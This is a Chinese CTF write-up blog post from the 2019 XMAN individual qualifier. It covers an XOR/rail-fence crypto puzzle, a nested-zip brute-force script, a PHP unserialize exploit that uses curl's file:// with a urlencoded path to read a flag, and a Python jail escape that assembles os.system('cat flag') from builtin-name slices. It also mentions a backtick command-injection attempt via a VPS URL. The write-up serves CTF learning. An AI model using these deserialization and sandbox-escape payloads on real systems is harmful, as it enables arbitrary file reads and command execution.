xman个人排位赛部分wp

xman个人排位赛部分wp

八月 10, 2019

膜各路大佬,tql,萌新瑟瑟发抖

Crypto

commom_encrypt

1565423024896

懒得看代码emmm,随手试一下,猜测就是栅栏了

cipher=(‘’.join(chr(ord(b[i])^i) for i in range(len(b))))

cipher[i] = ord(b[i])^i => b[i] = cipher[i]^i

#coding:utf-8

cipher = '''f^n2ekass:iy~>w|`ef"${Ip)8if'''
plain = (''.join(chr(ord(cipher[i])^i) for i in range(len(cipher))))
print plain

1565423188962

栅栏解密

1565423211107

Misc

onion’s_secret

binwalk发现jpg里藏有zip,foremost提取

得到一个压缩包和hint.txt

password is ?08867341

爆破了一个发现下面还有下一层的。。。一层套一层(脚本题

import zipfile
import string
import os

filedir = ""

for choice in range(100):

    dig = "./sample"+str(choice)
    filename = filedir+"onion.zip"

    # dictFile="pwdict.txt"
    hintdir = filedir + "hint.txt"
    password = open(hintdir,'r').read()
    # os.remove(hint)
    s = "password is "
    password = password[len(s):].split("?")
    num = string.digits #+ string.ascii_letters
    def burp(i):
        return password[0]+str(i)+password[1]
    # 
    for p in num:

        zf=zipfile.ZipFile(filename)

        try:
            p = burp(p)    
            zf.extractall(dig,pwd=p)
            print "crash. Password is %s" %p 
            filedir = dig[2:]+'/'
            exit(0)
        except:
            pass

1565423458543

大致效果如下(之所以不删除是因为不知道为啥会报错emmm还有每跑一段就会可能出现压缩包损失的问题。。。手动提取再跑

2333还是脚本能力太菜了 半自动可还行 凑合着用 喵喵喵,最后解压成flag.txt

1565423567189

web

ezphp

一个简单的代码审计之php反序列化

<?php

class Hello {
    protected $a;

    function test() {
        $b = strpos($this->a, 'flag');
        if($b) {
            die("Bye!");
        }
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $this->a);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
        echo curl_exec($c);
    }

    function __destruct(){
        $this->test();
    }
}

if (isset($_GET["z"])) {
    unserialize($_GET["z"]);
} else {
    highlight_file(__FILE__);
}

利用Hello类test方法的curl读文件

curl支持file协议(本来想命令注入直接执行传到服务器,不知道为啥不行emmm例如 http://vps:port/\`ls\`

没怎么仔细研究,后来就一直在绕过这个flag。。。花了好久

最后在自己环境测试突然想起curl可能也会urldecode

urlencode绕过flag检测

<?php

class Hello {
    protected $a = "file:///%66%6c%61%67";

    // function __construct(){
    //     $this->a = "file://index.php";
    // }

    function test() {
        $b = strpos($this->a, 'flag');
        if($b) {
            die("Bye!");
        }
        // echo "this"
        $c = curl_init();
        curl_setopt($c, CURLOPT_URL, $this->a);
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 5);
        echo curl_exec($c);
    }

    function __destruct(){
        $this->test();
    }
}

// if (isset($_GET["z"])) {
//     unserialize($_GET["z"]);
// } else {
//     highlight_file(__FILE__);
$z  = new Hello();
echo urlencode(serialize($z));

payload:

1565424067640

注意有“问题,所以hackbar传参

escape

沙箱逃逸Orz

想起之前看smile写过这类文章Orz,去膜一下

https://www.smi1e.top/python-%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/

这题waf有点多

banned: [“‘“, ‘“‘, ‘.’, ‘reload’, ‘open’, ‘input’, ‘file’, ‘if’, ‘else’, ‘eval’, ‘exit’, ‘import’, ‘quit’, ‘exec’, ‘code’, ‘const’, ‘vars’, ‘str’, ‘chr’, ‘ord’, ‘local’, ‘global’, ‘join’, ‘format’, ‘replace’, ‘translate’, ‘try’, ‘except’, ‘wi th’, ‘content’, ‘frame’, ‘back’]

Try to escape from this Jail
The only function you can know is:
def hello():
   os.system("echo hello")
and s is defined:
s=repr({x: getattr(hello,x) for x in dir(hello)})

有个getattr函数的hint

1565424386384

尝试构造payload

想起它自己调用过os.system,所以用过import了os库

尝试构造

getattr(os, “system”)(“ls”)

想绕过字符串emmm纠结了好久,突然想起可以拼接

利用__builtins__拼接

s = ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'Environm entError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexE rror', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError',  'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'U nicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '__debug__', '__doc__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', ' basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'd elattr', 'dict', 'dir', 'divmod', 'enumerate', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex' , 'id', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', ' oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sor ted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']
# print s.index("")
# print s[6][5:8]
# print(getattr(os, "system")("ls"))
assert "system" == s[38][2]+s[38][1:6]
assert "ls" == s[11][2:4]
# getattr(os, dir(__builtins__)[38][2]+dir(__builtins__)[38][1:6])(dir(__builtins__)[6][5:8]+s[-3]+dir(__builtins__)[84][0:2]+dir(__builtins__)[56][6:8])

1565424604942

找到flag,然后突然发现cat和flag中间有个空格找不到拼接字符

想起

def hello():
os.system(“echo hello”)

这边有个空格,打印一下s

1565424739197

这边就有空格

s = ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'Environm entError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexE rror', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError',  'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError', 'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'U nicodeWarning', 'UserWarning', 'ValueError', 'Warning', 'ZeroDivisionError', '__debug__', '__doc__', '__name__', '__package__', 'abs', 'all', 'any', 'apply', ' basestring', 'bin', 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', 'credits', 'd elattr', 'dict', 'dir', 'divmod', 'enumerate', 'exit', 'file', 'filter', 'float', 'format', 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex' , 'id', 'int', 'intern', 'isinstance', 'issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object', ' oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', 'reversed', 'round', 'set', 'setattr', 'slice', 'sor ted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr', 'unicode', 'vars', 'xrange', 'zip']
st = '''{'func_closure': None, '__module__': '__main__', '__str__': <method-wrapper '__str__' of function object at 0x7f9f404205f0>, '__reduce__': <built-in method __reduce__ of function object at 0x7f9f404205f0>, '__dict__': {}, '__sizeof__': <built-in method __sizeof__ of function object at 0x7f9f404205f0>, '__code__': <code object hello at 0x7f9f40466930, file "/home/ctf/server.py", line 20>, '__init__': <method-wrapper '__init__' of function object at 0x7f9f404205f0>, 'func_code': <code object hello at 0x7f9f40466930, file "/home/ctf/server.py", line 20>, '__setattr__': <method-wrapper '__setattr__' of function object at 0x7f9f404205f0>, '__reduce_ex__': <built-in method __reduce_ex__ of function object at 0x7f9f404205f0>, '__new__': <built-in method __new__ of type object at 0x8f66c0>, '__format__': <built-in method __format__ of function object at 0x7f9f404205f0>, '__class__': <type 'function'>, '__closure__': None, 'func_name': 'hello', '__call__': <method-wrapper '__call__' of function object at 0x7f9f404205f0>, 'func_globals': {'info': ['Try to escape from this Jail', 'The only function you can know is:', 'def hello():', '   os.system("echo hello")', 'and s is defined:', 's=repr({x: getattr(hello,x) for x in dir(hello)})'], '__builtins__': <module '__builtin__' (built-in)>, '__file__': '/home/ctf/server.py', 'hello': <function hello at 0x7f9f404205f0>, '__package__': None, 'filtered': ["'", '"', '.', 'reload', 'open', 'input', 'file', 'if', 'else', 'eval', 'exit', 'import', 'quit', 'exec', 'code', 'const', 'vars', 'str', 'chr', 'ord', 'local', 'global', 'join', 'format', 'replace', 'translate', 'try', 'except', 'with', 'content', 'frame', 'back'], '__name__': '__main__', 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, '__doc__': None}, '__doc__': ' just echo hello ', 'func_dict': {}, '__getattribute__': <method-wrapper '__getattribute__' of function object at 0x7f9f404205f0>, '__subclasshook__': <built-in method __subclasshook__ of type object at 0x8f66c0>, '__name__': 'hello', '__get__': <method-wrapper '__get__' of function object at 0x7f9f404205f0>, '__defaults__': None, '__globals__': {'info': ['Try to escape from this Jail', 'The only function you can know is:', 'def hello():', '   os.system("echo hello")', 'and s is defined:', 's=repr({x: getattr(hello,x) for x in dir(hello)})'], '__builtins__': <module '__builtin__' (built-in)>, '__file__': '/home/ctf/server.py', 'hello': <function hello at 0x7f9f404205f0>, '__package__': None, 'filtered': ["'", '"', '.', 'reload', 'open', 'input', 'file', 'if', 'else', 'eval', 'exit', 'import', 'quit', 'exec', 'code', 'const', 'vars', 'str', 'chr', 'ord', 'local', 'global', 'join', 'format', 'replace', 'translate', 'try', 'except', 'with', 'content', 'frame', 'back'], '__name__': '__main__', 'os': <module 'os' from '/usr/lib/python2.7/os.pyc'>, '__doc__': None}, '__delattr__': <method-wrapper '__delattr__' of function object at 0x7f9f404205f0>, 'func_defaults': None, '__repr__': <method-wrapper '__repr__' of function object at 0x7f9f404205f0>, '__hash__': <method-wrapper '__hash__' of function object at 0x7f9f404205f0>, 'func_doc': ' just echo hello '}'''
print st[-3]
# print s.index("DeprecationWarning")

# print s[6][5:8]
# print(getattr(os, "system")("ls"))
assert "system" == s[38][2]+s[38][1:6]
assert "ls" == s[11][2:4]
# getattr(os, dir(__builtins__)[38][2]+dir(__builtins__)[38][1:6])(dir(__builtins__)[11][2:4])
assert "cat" == s[6][5:8]
assert "flag" == s[84][0:2]+s[56][6:8]

#"cat_flag" == dir(__builtins__)[6][5:8]+s[-3]+dir(__builtins__)[84][0:2]+dir(__builtins__)[56][6:8]

payload

print getattr(os, dir(builtins)[38][2]+dir(builtins)[38][1:6])(dir(builtins)[6][5:8]+s[-3]+dir(builtins)[84][0:2]+dir(builtins)[56][6:8])

1565424862290

本文作者: Char0n
本文地址: http://charon.xin/2019/08/10/xman个人排位赛部分wp/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 3.0 CN 许可协议。转载请注明出处!